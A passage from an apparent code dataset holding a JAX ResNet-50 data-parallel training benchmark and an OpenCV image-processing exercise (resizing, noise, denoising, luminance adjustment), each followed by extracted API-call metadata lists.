'numpy.meshgrid', 'np.meshgrid', (['xl', 'yl'], {}), '(xl, yl)\n', (12395, 12403), True, 'import numpy as np\n'), ((12731, 12753), 'scipy.integrate.simps', 'spint.simps', (['fx'], {'dx': 'dx'}), '(fx, dx=dx)\n', (12742, 12753), True, 'import scipy.integrate as spint\n'), ((13417, 13448), 'numpy.arange', 'np.arange', (['limx[0]', 'limx[1]', 'dx'], {}), '(limx[0], limx[1], dx)\n', (13426, 13448), True, 'import numpy as np\n'), ((13635, 13657), 'scipy.integrate.simps', 'spint.simps', (['fx'], {'dx': 'dx'}), '(fx, dx=dx)\n', (13646, 13657), True, 'import scipy.integrate as spint\n'), ((6274, 6295), 'numpy.abs', 'np.abs', (['(res - lastres)'], {}), '(res - lastres)\n', (6280, 6295), True, 'import numpy as np\n'), ((7178, 7199), 'numpy.abs', 'np.abs', (['(res - lastres)'], {}), '(res - lastres)\n', (7184, 7199), True, 'import numpy as np\n'), ((11454, 11476), 'scipy.integrate.simps', 'spint.simps', (['fz'], {'dx': 'dz'}), '(fz, dx=dz)\n', (11465, 11476), True, 'import scipy.integrate as spint\n'), ((11629, 11650), 'numpy.abs', 'np.abs', (['(res - lastres)'], {}), '(res - lastres)\n', (11635, 11650), True, 'import numpy as np\n'), ((12678, 12700), 'scipy.integrate.simps', 'spint.simps', (['fy'], {'dx': 'dy'}), '(fy, dx=dy)\n', (12689, 12700), True, 'import scipy.integrate as spint\n'), ((12822, 12843), 'numpy.abs', 'np.abs', (['(res - lastres)'], {}), '(res - lastres)\n', (12828, 12843), True, 'import numpy as np\n'), ((13726, 13747), 'numpy.abs', 'np.abs', (['(res - lastres)'], {}), '(res - lastres)\n', (13732, 13747), True, 'import numpy as np\n')]
# Copyright 2018 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """An MNIST example with single-program multiple-data (SPMD) data parallelism. The aim here is to illustrate how to use JAX's `pmap` to express and execute SPMD programs for data parallelism along a batch dimension, while also minimizing dependencies by avoiding the use of higher-level layers and optimizers libraries. """ from functools import partial import time import numpy as np import numpy.random as npr from jax import jit, grad, pmap from jax.scipy.special import logsumexp from jax.lib import xla_bridge from jax.tree_util import tree_map,tree_flatten,tree_unflatten from jax import lax import jax.numpy as jnp import numpy.random as npr import jax import jax.numpy as jnp from jax import jit, grad, random from jax.experimental import optimizers from jax.experimental import stax from jax.experimental.stax import (AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax) import ctypes _cudart = ctypes.CDLL('libcudart.so') def cu_prof_start(): ret = _cudart.cudaProfilerStart() if ret != 0: raise Exception('cudaProfilerStart() returned %d' % ret) def cu_prof_stop(): ret = _cudart.cudaProfilerStop() if ret != 0: raise Exception('cudaProfilerStop() returned %d' % ret) def ConvBlock(kernel_size, filters, strides=(2, 2)): ks = kernel_size filters1, filters2, filters3 = filters Main = stax.serial( Conv(filters1, (1, 1), strides), BatchNorm(), Relu, Conv(filters2, (ks, ks), padding='SAME'), BatchNorm(), Relu, Conv(filters3, (1, 1)), BatchNorm()) Shortcut = stax.serial(Conv(filters3, (1, 1), strides), BatchNorm()) return stax.serial(FanOut(2), stax.parallel(Main, Shortcut), FanInSum, Relu) def IdentityBlock(kernel_size, filters): ks = kernel_size filters1, filters2 = filters def make_main(input_shape): # the number of output channels depends on the number of input channels return stax.serial( Conv(filters1, (1, 1)), BatchNorm(), Relu, Conv(filters2, (ks, ks), padding='SAME'), BatchNorm(), Relu, Conv(input_shape[3], (1, 1)), BatchNorm()) Main = stax.shape_dependent(make_main) return stax.serial(FanOut(2), stax.parallel(Main, Identity), FanInSum, Relu) # ResNet architectures compose layers and ResNet blocks def ResNet50(num_classes): return stax.serial( GeneralConv(('HWCN', 'OIHW', 'NHWC'), 64, (7, 7), (2, 2), 'SAME'), BatchNorm(), Relu, MaxPool((3, 3), strides=(2, 2)), ConvBlock(3, [64, 64, 256], strides=(1, 1)), IdentityBlock(3, [64, 64]), IdentityBlock(3, [64, 64]), ConvBlock(3, [128, 128, 512]), IdentityBlock(3, [128, 128]), IdentityBlock(3, [128, 128]), IdentityBlock(3, [128, 128]), ConvBlock(3, [256, 256, 1024]), IdentityBlock(3, [256, 256]), IdentityBlock(3, [256, 256]), IdentityBlock(3, [256, 256]), IdentityBlock(3, [256, 256]), IdentityBlock(3, [256, 256]), ConvBlock(3, [512, 512, 2048]), IdentityBlock(3, [512, 512]), IdentityBlock(3, [512, 512]), AvgPool((7, 7)), Flatten, Dense(num_classes), LogSoftmax) if __name__ == "__main__": rng_key = random.PRNGKey(0) batch_size = 64 num_classes = 1001 input_shape = (224, 224, 3, batch_size) step_size = 0.1 num_steps = 10 init_fun, predict_fun = ResNet50(num_classes) _, init_params = init_fun(rng_key, input_shape) num_devices = xla_bridge.device_count() def loss(params, batch): inputs, targets = batch logits = predict_fun(params, inputs) return -jnp.sum(logits * targets) def accuracy(params, batch): inputs, targets = batch target_class = jnp.argmax(targets, axis=-1) predicted_class = jnp.argmax(predict_fun(params, inputs), axis=-1) return jnp.mean(predicted_class == target_class) def synth_batches(): rng = npr.RandomState(0) while True: images = rng.rand(*input_shape).astype('float32') labels = rng.randint(num_classes, size=(batch_size, 1)) onehot_labels = labels == jnp.arange(num_classes) batch_size_per_device, ragged = divmod(images.shape[-1], num_devices) if ragged: msg = "batch size must be divisible by device count, got {} and {}." raise ValueError(msg.format(batch_size, num_devices)) shape_prefix = (num_devices, ) shape_postfix = (batch_size_per_device,) images = images.reshape(shape_prefix + images.shape[:-1]+shape_postfix) labels = labels.reshape(shape_prefix + shape_postfix+labels.shape[-1:]) yield images, labels def ps_synth_batches(): rng = npr.RandomState(0) while True: images = rng.rand(*input_shape).astype('float32') labels = rng.randint(num_classes, size=(batch_size, 1)) onehot_labels = labels == jnp.arange(num_classes) yield images, onehot_labels opt_init, opt_update, get_params = optimizers.momentum(step_size, mass=0.9) batches = synth_batches() ps_batches = ps_synth_batches() @jit def update(i, opt_state, batch): params = get_params(opt_state) return opt_update(i, grad(loss)(params, batch), opt_state) @partial(pmap, axis_name='batch') def allreduce_spmd_update( i,op_state, batch): #params = tree_unflatten(treedef, params) params = get_params(op_state) grads = grad(loss)(params, batch) leaves, local_treedef = tree_flatten(grads) # We compute the total gradients, summing across the device-mapped axis, # using the `lax.psum` SPMD primitive, which does a fast all-reduce-sum. grads = [lax.psum(dw, 'batch') for dw in leaves] grads = tree_unflatten(local_treedef, grads) op_state = opt_update(i, grads, op_state) return op_state @partial(pmap, axis_name='batch') def ps_spmd_update( params, batch): grads = grad(loss)(params, batch) return grads @partial(jit, device=jax.devices()[0]) def ps_pre_process(op_state): params = get_params(op_state) replicated_op_params = tree_map(replicate_array, params) return replicated_op_params @partial(jit, device=jax.devices()[0]) def ps_post_process(grads,op_state,i): grads = tree_map(lambda x: jnp.sum(x,axis=0), grads) op_state = opt_update(i, grads, op_state) return op_state @jit def ps_loop_process(op_state,k,batch_list): grads = [] op_state = jax.device_put(op_state, jax.devices()[0]) for i in range(num_devices): params = jax.device_put(get_params(op_state), jax.devices()[i]) _grad = jax.device_put(grad(loss)(params, batch_list[i]), jax.devices()[i]) _grad = jax.device_put(_grad, jax.devices()[0]) k = jax.device_put(k, jax.devices()[0]) op_state = opt_update(k, _grad, op_state) return op_state replicate_array = lambda x: jnp.broadcast_to(x, (num_devices,) + x.shape) allreduce = True if allreduce: op_state = opt_init(init_params) replicated_op_state = tree_map(replicate_array, op_state) for i in range(num_steps): #params, treedef = tree_flatten(params) if i==3: cu_prof_start() new_batch = next(batches) start_time = time.time() replicated_op_state = allreduce_spmd_update( jnp.array([i]*num_devices),replicated_op_state, new_batch) if i == 3: cu_prof_stop() end_time = time.time() - start_time print("time:",end_time) else: op_state = jax.device_put(opt_init(init_params), jax.devices()[0]) ''' for i in range (num_steps): new_batch = next(batches) start_time = time.time() replicated_op_params = ps_pre_process(op_state) grads = ps_spmd_update(replicated_op_params,new_batch) op_state = ps_post_process(grads,op_state,i) end_time = time.time() - start_time print("time:",end_time) ''' for i in range (num_steps): if i==3: cu_prof_start() batches_list = [] for i in range(num_devices): batches_list.append(jax.device_put(next(ps_batches),jax.devices()[i])) start_time = time.time() op_state = ps_loop_process(op_state,i,batches_list) end_time = time.time() - start_time print("time:",end_time) if i==3: cu_prof_stop()
[ "jax.experimental.stax.BatchNorm", "jax.experimental.stax.GeneralConv", "jax.random.PRNGKey", "jax.lax.psum", "jax.tree_util.tree_unflatten", "jax.tree_util.tree_map", "jax.experimental.stax.parallel", "jax.numpy.argmax", "jax.experimental.stax.FanOut", "numpy.random.RandomState", "jax.experimental.optimizers.momentum", "jax.experimental.stax.Dense", "jax.experimental.stax.AvgPool", "jax.experimental.stax.Conv", "jax.experimental.stax.MaxPool", "jax.tree_util.tree_flatten", "jax.numpy.broadcast_to", "jax.experimental.stax.shape_dependent", "functools.partial", "jax.numpy.sum", "ctypes.CDLL", "jax.numpy.array", "jax.numpy.arange", "time.time", "jax.lib.xla_bridge.device_count", "jax.grad", "jax.numpy.mean", "jax.devices" ]
[((1615, 1642), 'ctypes.CDLL', 'ctypes.CDLL', (['"""libcudart.so"""'], {}), "('libcudart.so')\n", (1626, 1642), False, 'import ctypes\n'), ((2767, 2798), 'jax.experimental.stax.shape_dependent', 'stax.shape_dependent', (['make_main'], {}), '(make_main)\n', (2787, 2798), False, 'from jax.experimental import stax\n'), ((3813, 3830), 'jax.random.PRNGKey', 'random.PRNGKey', (['(0)'], {}), '(0)\n', (3827, 3830), False, 'from jax import jit, grad, random\n'), ((4064, 4089), 'jax.lib.xla_bridge.device_count', 'xla_bridge.device_count', ([], {}), '()\n', (4087, 4089), False, 'from jax.lib import xla_bridge\n'), ((5530, 5570), 'jax.experimental.optimizers.momentum', 'optimizers.momentum', (['step_size'], {'mass': '(0.9)'}), '(step_size, mass=0.9)\n', (5549, 5570), False, 'from jax.experimental import optimizers\n'), ((5778, 5810), 'functools.partial', 'partial', (['pmap'], {'axis_name': '"""batch"""'}), "(pmap, axis_name='batch')\n", (5785, 5810), False, 'from functools import partial\n'), ((6354, 6386), 'functools.partial', 'partial', (['pmap'], {'axis_name': '"""batch"""'}), "(pmap, axis_name='batch')\n", (6361, 6386), False, 'from functools import partial\n'), ((2052, 2083), 'jax.experimental.stax.Conv', 'Conv', (['filters1', '(1, 1)', 'strides'], {}), '(filters1, (1, 1), strides)\n', (2056, 2083), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((2085, 2096), 'jax.experimental.stax.BatchNorm', 'BatchNorm', ([], {}), '()\n', (2094, 2096), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((2110, 2150), 'jax.experimental.stax.Conv', 'Conv', (['filters2', '(ks, ks)'], {'padding': '"""SAME"""'}), "(filters2, (ks, ks), padding='SAME')\n", (2114, 2150), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((2152, 2163), 'jax.experimental.stax.BatchNorm', 'BatchNorm', ([], {}), '()\n', (2161, 2163), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((2177, 2199), 'jax.experimental.stax.Conv', 'Conv', (['filters3', '(1, 1)'], {}), '(filters3, (1, 1))\n', (2181, 2199), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((2201, 2212), 'jax.experimental.stax.BatchNorm', 'BatchNorm', ([], {}), '()\n', (2210, 2212), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((2239, 2270), 'jax.experimental.stax.Conv', 'Conv', (['filters3', '(1, 1)', 'strides'], {}), '(filters3, (1, 1), strides)\n', (2243, 2270), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((2272, 2283), 'jax.experimental.stax.BatchNorm', 'BatchNorm', ([], {}), '()\n', (2281, 2283), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((2306, 2315), 'jax.experimental.stax.FanOut', 'FanOut', (['(2)'], {}), '(2)\n', (2312, 2315), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((2317, 2346), 'jax.experimental.stax.parallel', 'stax.parallel', (['Main', 'Shortcut'], {}), '(Main, Shortcut)\n', (2330, 2346), False, 'from jax.experimental import stax\n'), ((2820, 2829), 'jax.experimental.stax.FanOut', 'FanOut', (['(2)'], {}), '(2)\n', (2826, 2829), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((2831, 2860), 'jax.experimental.stax.parallel', 'stax.parallel', (['Main', 'Identity'], {}), '(Main, Identity)\n', (2844, 2860), False, 'from jax.experimental import stax\n'), ((2992, 3057), 'jax.experimental.stax.GeneralConv', 'GeneralConv', (["('HWCN', 'OIHW', 'NHWC')", '(64)', '(7, 7)', '(2, 2)', '"""SAME"""'], {}), "(('HWCN', 'OIHW', 'NHWC'), 64, (7, 7), (2, 2), 'SAME')\n", (3003, 3057), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((3065, 3076), 'jax.experimental.stax.BatchNorm', 'BatchNorm', ([], {}), '()\n', (3074, 3076), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((3084, 3115), 'jax.experimental.stax.MaxPool', 'MaxPool', (['(3, 3)'], {'strides': '(2, 2)'}), '((3, 3), strides=(2, 2))\n', (3091, 3115), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((3715, 3730), 'jax.experimental.stax.AvgPool', 'AvgPool', (['(7, 7)'], {}), '((7, 7))\n', (3722, 3730), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((3741, 3759), 'jax.experimental.stax.Dense', 'Dense', (['num_classes'], {}), '(num_classes)\n', (3746, 3759), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((4305, 4333), 'jax.numpy.argmax', 'jnp.argmax', (['targets'], {'axis': '(-1)'}), '(targets, axis=-1)\n', (4315, 4333), True, 'import jax.numpy as jnp\n'), ((4416, 4457), 'jax.numpy.mean', 'jnp.mean', (['(predicted_class == target_class)'], {}), '(predicted_class == target_class)\n', (4424, 4457), True, 'import jax.numpy as jnp\n'), ((4492, 4510), 'numpy.random.RandomState', 'npr.RandomState', (['(0)'], {}), '(0)\n', (4507, 4510), True, 'import numpy.random as npr\n'), ((5249, 5267), 'numpy.random.RandomState', 'npr.RandomState', (['(0)'], {}), '(0)\n', (5264, 5267), True, 'import numpy.random as npr\n'), ((6007, 6026), 'jax.tree_util.tree_flatten', 'tree_flatten', (['grads'], {}), '(grads)\n', (6019, 6026), False, 'from jax.tree_util import tree_map, tree_flatten, tree_unflatten\n'), ((6246, 6282), 'jax.tree_util.tree_unflatten', 'tree_unflatten', (['local_treedef', 'grads'], {}), '(local_treedef, grads)\n', (6260, 6282), False, 'from jax.tree_util import tree_map, tree_flatten, tree_unflatten\n'), ((6616, 6649), 'jax.tree_util.tree_map', 'tree_map', (['replicate_array', 'params'], {}), '(replicate_array, params)\n', (6624, 6649), False, 'from jax.tree_util import tree_map, tree_flatten, tree_unflatten\n'), ((7396, 7441), 'jax.numpy.broadcast_to', 'jnp.broadcast_to', (['x', '((num_devices,) + x.shape)'], {}), '(x, (num_devices,) + x.shape)\n', (7412, 7441), True, 'import jax.numpy as jnp\n'), ((7541, 7576), 'jax.tree_util.tree_map', 'tree_map', (['replicate_array', 'op_state'], {}), '(replicate_array, op_state)\n', (7549, 7576), False, 'from jax.tree_util import tree_map, tree_flatten, tree_unflatten\n'), ((2595, 2617), 'jax.experimental.stax.Conv', 'Conv', (['filters1', '(1, 1)'], {}), '(filters1, (1, 1))\n', (2599, 2617), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((2619, 2630), 'jax.experimental.stax.BatchNorm', 'BatchNorm', ([], {}), '()\n', (2628, 2630), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((2646, 2686), 'jax.experimental.stax.Conv', 'Conv', (['filters2', '(ks, ks)'], {'padding': '"""SAME"""'}), "(filters2, (ks, ks), padding='SAME')\n", (2650, 2686), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((2688, 2699), 'jax.experimental.stax.BatchNorm', 'BatchNorm', ([], {}), '()\n', (2697, 2699), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((2715, 2743), 'jax.experimental.stax.Conv', 'Conv', (['input_shape[3]', '(1, 1)'], {}), '(input_shape[3], (1, 1))\n', (2719, 2743), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((2745, 2756), 'jax.experimental.stax.BatchNorm', 'BatchNorm', ([], {}), '()\n', (2754, 2756), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((4200, 4225), 'jax.numpy.sum', 'jnp.sum', (['(logits * targets)'], {}), '(logits * targets)\n', (4207, 4225), True, 'import jax.numpy as jnp\n'), ((5953, 5963), 'jax.grad', 'grad', (['loss'], {}), '(loss)\n', (5957, 5963), False, 'from jax import jit, grad, random\n'), ((6194, 6215), 'jax.lax.psum', 'lax.psum', (['dw', '"""batch"""'], {}), "(dw, 'batch')\n", (6202, 6215), False, 'from jax import lax\n'), ((6437, 6447), 'jax.grad', 'grad', (['loss'], {}), '(loss)\n', (6441, 6447), False, 'from jax import jit, grad, random\n'), ((7744, 7755), 'time.time', 'time.time', ([], {}), '()\n', (7753, 7755), False, 'import time\n'), ((8634, 8645), 'time.time', 'time.time', ([], {}), '()\n', (8643, 8645), False, 'import time\n'), ((4677, 4700), 'jax.numpy.arange', 'jnp.arange', (['num_classes'], {}), '(num_classes)\n', (4687, 4700), True, 'import jax.numpy as jnp\n'), ((5434, 5457), 'jax.numpy.arange', 'jnp.arange', (['num_classes'], {}), '(num_classes)\n', (5444, 5457), True, 'import jax.numpy as jnp\n'), ((5736, 5746), 'jax.grad', 'grad', (['loss'], {}), '(loss)\n', (5740, 5746), False, 'from jax import jit, grad, random\n'), ((6505, 6518), 'jax.devices', 'jax.devices', ([], {}), '()\n', (6516, 6518), False, 'import jax\n'), ((6796, 6814), 'jax.numpy.sum', 'jnp.sum', (['x'], {'axis': '(0)'}), '(x, axis=0)\n', (6803, 6814), True, 'import jax.numpy as jnp\n'), ((6706, 6719), 'jax.devices', 'jax.devices', ([], {}), '()\n', (6717, 6719), False, 'import jax\n'), ((6997, 7010), 'jax.devices', 'jax.devices', ([], {}), '()\n', (7008, 7010), False, 'import jax\n'), ((7234, 7247), 'jax.devices', 'jax.devices', ([], {}), '()\n', (7245, 7247), False, 'import jax\n'), ((7278, 7291), 'jax.devices', 'jax.devices', ([], {}), '()\n', (7289, 7291), False, 'import jax\n'), ((7807, 7835), 'jax.numpy.array', 'jnp.array', (['([i] * num_devices)'], {}), '([i] * num_devices)\n', (7816, 7835), True, 'import jax.numpy as jnp\n'), ((7923, 7934), 'time.time', 'time.time', ([], {}), '()\n', (7932, 7934), False, 'import time\n'), ((8039, 8052), 'jax.devices', 'jax.devices', ([], {}), '()\n', (8050, 8052), False, 'import jax\n'), ((8721, 8732), 'time.time', 'time.time', ([], {}), '()\n', (8730, 8732), False, 'import time\n'), ((7100, 7113), 'jax.devices', 'jax.devices', ([], {}), '()\n', (7111, 7113), False, 'import jax\n'), ((7147, 7157), 'jax.grad', 'grad', (['loss'], {}), '(loss)\n', (7151, 7157), False, 'from jax import jit, grad, random\n'), ((7182, 7195), 'jax.devices', 'jax.devices', ([], {}), '()\n', (7193, 7195), False, 'import jax\n'), ((8596, 8609), 'jax.devices', 'jax.devices', ([], {}), '()\n', (8607, 8609), False, 'import jax\n')]
import os from math import * import numpy as np from scipy import misc from scipy.ndimage import gaussian_filter import cv2 def reviseImage(): img_names = [ "1.jpeg", "2.jpeg", "3.jpeg", "dark.jpeg", "overexposure.jpeg" ] for filename in img_names: fn = "./img_data/cutted/" + filename img = cv2.imread(fn, cv2.IMREAD_GRAYSCALE) newimg = cv2.resize(img, (640, 480)) cv2.imwrite("./part1/revised_" + filename, newimg) def geoTransform(): """ (2) geometric transformations """ for fn in os.listdir("./part1"): path = "./part1/%s" % fn img = cv2.imread(path, cv2.IMREAD_UNCHANGED) # [1] https://docs.opencv.org/3.4.2/da/d6e/tutorial_py_geometric_transformations.html double = cv2.resize(img, (1280, 960), interpolation=cv2.INTER_LINEAR) shrink = cv2.resize(img, (320, 240), interpolation=cv2.INTER_CUBIC) stretch = cv2.resize(img, (1280, 720), interpolation=cv2.INTER_CUBIC) cv2.imwrite("./part2/double_" + fn, double) cv2.imwrite("./part2/shrink_" + fn, shrink) cv2.imwrite("./part2/stretch_" + fn, stretch) def addGaussianNoises(): """ (3) add 3 different noises """ img_names = [ "1.jpeg", "2.jpeg", "3.jpeg", "dark.jpeg", "overexposure.jpeg" ] for (m, v) in [(10, 100), (50, 30), (200, 200)]: for filename in img_names: s = sqrt(v) fn = "./part1/revised_" + filename img = cv2.imread(fn, cv2.IMREAD_UNCHANGED) gaussian = np.random.normal(m, s, (480, 640)) noisy_image = np.zeros(img.shape, np.float32) noisy_image = img + gaussian cv2.normalize( noisy_image, noisy_image, 0, 255, cv2.NORM_MINMAX, dtype=-1) noisy_image = noisy_image.astype(np.uint8) cv2.imwrite("./part3/%d_%d_" % (m, v) + filename, noisy_image) def removeGaussianNoises(): """ (4) remove noises from part 3 """ for fn in os.listdir("./part3"): path = "./part3/%s" % fn img = cv2.imread(path, cv2.IMREAD_UNCHANGED) newimg = cv2.fastNlMeansDenoising(img, None, 10, 7, 21) cv2.imwrite("./part4/denoise_" + fn, newimg) def luminanceAdjust(): """ (5) luminance adjustment of overexposured and dark image in (1) """ filename = ["dark.jpeg", "overexposure.jpeg"] for fn in filename: path = "./part1/revised_" + fn img = cv2.imread(path, cv2.IMREAD_UNCHANGED) # 1. histogram equalize newimg = cv2.equalizeHist(img) cv2.imwrite("./part5/equHist_" + fn, newimg) # 2. Gamma correction gamma = 0.4 LUT = np.empty((1, 256), np.uint8) for i in range(256): LUT[0, i] = np.clip((i / 255.0)**gamma * 255.0, 0, 255) newimg2 = cv2.LUT(img, LUT) cv2.imwrite("./part5/gamma_" + fn, newimg2) def main(): # part 1 #reviseImage() # part 2 #geoTransform() # part 3 #addGaussianNoises() # part 4 #removeGaussianNoises() # part 5 luminanceAdjust() if __name__ == "__main__": main()
[ "cv2.equalizeHist", "cv2.imwrite", "numpy.empty", "numpy.zeros", "numpy.clip", "cv2.fastNlMeansDenoising", "cv2.imread", "cv2.LUT", "numpy.random.normal", "cv2.normalize", "os.listdir", "cv2.resize" ]
[((559, 580), 'os.listdir', 'os.listdir', (['"""./part1"""'], {}), "('./part1')\n", (569, 580), False, 'import os\n'), ((2020, 2041), 'os.listdir', 'os.listdir', (['"""./part3"""'], {}), "('./part3')\n", (2030, 2041), False, 'import os\n'), ((332, 368), 'cv2.imread', 'cv2.imread', (['fn', 'cv2.IMREAD_GRAYSCALE'], {}), '(fn, cv2.IMREAD_GRAYSCALE)\n', (342, 368), False, 'import cv2\n'), ((386, 413), 'cv2.resize', 'cv2.resize', (['img', '(640, 480)'], {}), '(img, (640, 480))\n', (396, 413), False, 'import cv2\n'), ((422, 472), 'cv2.imwrite', 'cv2.imwrite', (["('./part1/revised_' + filename)", 'newimg'], {}), "('./part1/revised_' + filename, newimg)\n", (433, 472), False, 'import cv2\n'), ((629, 667), 'cv2.imread', 'cv2.imread', (['path', 'cv2.IMREAD_UNCHANGED'], {}), '(path, cv2.IMREAD_UNCHANGED)\n', (639, 667), False, 'import cv2\n'), ((779, 839), 'cv2.resize', 'cv2.resize', (['img', '(1280, 960)'], {'interpolation': 'cv2.INTER_LINEAR'}), '(img, (1280, 960), interpolation=cv2.INTER_LINEAR)\n', (789, 839), False, 'import cv2\n'), ((857, 915), 'cv2.resize', 'cv2.resize', (['img', '(320, 240)'], {'interpolation': 'cv2.INTER_CUBIC'}), '(img, (320, 240), interpolation=cv2.INTER_CUBIC)\n', (867, 915), False, 'import cv2\n'), ((934, 993), 'cv2.resize', 'cv2.resize', (['img', '(1280, 720)'], {'interpolation': 'cv2.INTER_CUBIC'}), '(img, (1280, 720), interpolation=cv2.INTER_CUBIC)\n', (944, 993), False, 'import cv2\n'), ((1002, 1045), 'cv2.imwrite', 'cv2.imwrite', (["('./part2/double_' + fn)", 'double'], {}), "('./part2/double_' + fn, double)\n", (1013, 1045), False, 'import cv2\n'), ((1054, 1097), 'cv2.imwrite', 'cv2.imwrite', (["('./part2/shrink_' + fn)", 'shrink'], {}), "('./part2/shrink_' + fn, shrink)\n", (1065, 1097), False, 'import cv2\n'), ((1106, 1151), 'cv2.imwrite', 'cv2.imwrite', (["('./part2/stretch_' + fn)", 'stretch'], {}), "('./part2/stretch_' + fn, stretch)\n", (1117, 1151), False, 'import cv2\n'), ((2090, 2128), 'cv2.imread', 'cv2.imread', (['path', 'cv2.IMREAD_UNCHANGED'], {}), '(path, cv2.IMREAD_UNCHANGED)\n', (2100, 2128), False, 'import cv2\n'), ((2146, 2192), 'cv2.fastNlMeansDenoising', 'cv2.fastNlMeansDenoising', (['img', 'None', '(10)', '(7)', '(21)'], {}), '(img, None, 10, 7, 21)\n', (2170, 2192), False, 'import cv2\n'), ((2201, 2245), 'cv2.imwrite', 'cv2.imwrite', (["('./part4/denoise_' + fn)", 'newimg'], {}), "('./part4/denoise_' + fn, newimg)\n", (2212, 2245), False, 'import cv2\n'), ((2482, 2520), 'cv2.imread', 'cv2.imread', (['path', 'cv2.IMREAD_UNCHANGED'], {}), '(path, cv2.IMREAD_UNCHANGED)\n', (2492, 2520), False, 'import cv2\n'), ((2570, 2591), 'cv2.equalizeHist', 'cv2.equalizeHist', (['img'], {}), '(img)\n', (2586, 2591), False, 'import cv2\n'), ((2600, 2644), 'cv2.imwrite', 'cv2.imwrite', (["('./part5/equHist_' + fn)", 'newimg'], {}), "('./part5/equHist_' + fn, newimg)\n", (2611, 2644), False, 'import cv2\n'), ((2709, 2737), 'numpy.empty', 'np.empty', (['(1, 256)', 'np.uint8'], {}), '((1, 256), np.uint8)\n', (2717, 2737), True, 'import numpy as np\n'), ((2853, 2870), 'cv2.LUT', 'cv2.LUT', (['img', 'LUT'], {}), '(img, LUT)\n', (2860, 2870), False, 'import cv2\n'), ((2879, 2922), 'cv2.imwrite', 'cv2.imwrite', (["('./part5/gamma_' + fn)", 'newimg2'], {}), "('./part5/gamma_' + fn, newimg2)\n", (2890, 2922), False, 'import cv2\n'), ((1498, 1534), 'cv2.imread', 'cv2.imread', (['fn', 'cv2.IMREAD_UNCHANGED'], {}), '(fn, cv2.IMREAD_UNCHANGED)\n', (1508, 1534), False, 'import cv2\n'), ((1558, 1592), 'numpy.random.normal', 'np.random.normal', (['m', 's', '(480, 640)'], {}), '(m, s, (480, 640))\n', (1574, 1592), True, 'import numpy as np\n'), ((1619, 1650), 'numpy.zeros', 'np.zeros', (['img.shape', 'np.float32'], {}), '(img.shape, np.float32)\n', (1627, 1650), True, 'import numpy as np\n'), ((1704, 1778), 'cv2.normalize', 'cv2.normalize', (['noisy_image', 'noisy_image', '(0)', '(255)', 'cv2.NORM_MINMAX'], {'dtype': '(-1)'}), '(noisy_image, noisy_image, 0, 255, cv2.NORM_MINMAX, dtype=-1)\n', (1717, 1778), False, 'import cv2\n'), ((1863, 1925), 'cv2.imwrite', 'cv2.imwrite', 